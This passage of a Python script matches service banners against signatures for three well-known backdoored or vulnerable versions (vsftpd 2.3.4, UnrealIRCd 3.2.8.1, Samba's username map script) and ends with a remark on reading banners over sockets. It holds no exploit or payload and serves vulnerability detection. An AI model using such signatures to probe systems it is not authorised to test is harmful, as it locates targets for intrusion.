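    return (nums, 0, int(m.group(2)))


def exactly(version):
    key = parse_version(version)
    return lambda v: v == key


def between(low, high):
    lo, hi = parse_version(low), parse_version(high)
    return lambda v: lo <= v <= hi


# Signature table: (identifier, banner pattern with a 'ver' group, affected-version predicate).
# Affected versions are the ones named in the public advisories for each issue.
SIGNATURES = [
    ("BID:48539 vsftpd 2.3.4 backdoor",
     re.compile(r"vsFTPd (?P<ver>\d+(?:\.\d+)*)"), exactly("2.3.4")),
    ("CVE-2010-2075 UnrealIRCd 3.2.8.1 backdoor",
     re.compile(r"Unreal(?P<ver>\d+(?:\.\d+)*)"), exactly("3.2.8.1")),
    ("CVE-2007-2447 Samba username map script",
     re.compile(r"Samba (?P<ver>\d+\.\d+\.\d+(?:rc\d+)?)"), between("3.0.0", "3.0.25rc3")),
]


def check_banner(banner):
    """Return [(identifier, version)] for every signature whose version range the banner falls in."""
    findings = []
    for ident, pattern, affected in SIGNATURES:
        m = pattern.search(banner)
        if m and affected(parse_version(m.group("ver"))):
            findings.append((ident, m.group("ver")))
    return findings


# Constructed sample banners: FTP greeting, IRC 002 numeric, SMB/NetBIOS server string.
SAMPLE_BANNERS = [
    "220 (vsFTPd 2.3.4)",
    "220 (vsFTPd 3.0.3)",
    ":irc.example.test 002 nick :Your host is irc.example.test, running version Unreal3.2.8.1",
    "Samba 3.0.20-Debian",
    "Samba 3.0.25",
]


def scan(banners):
    """Map each banner to its findings; an empty list means no version-based match."""
    return {b: check_banner(b) for b in banners}


if __name__ == "__main__":
    for banner, found in scan(SAMPLE_BANNERS).items():
        print("%-90s %s" % (banner, found or "no match"))
```

To turn this into the network script the task asked for, the banner source is a socket read of the first line after connecting (for IRC, after sending NICK and USER); everything from check_banner down stays the same, which is the point the post makes about scanners not being magic.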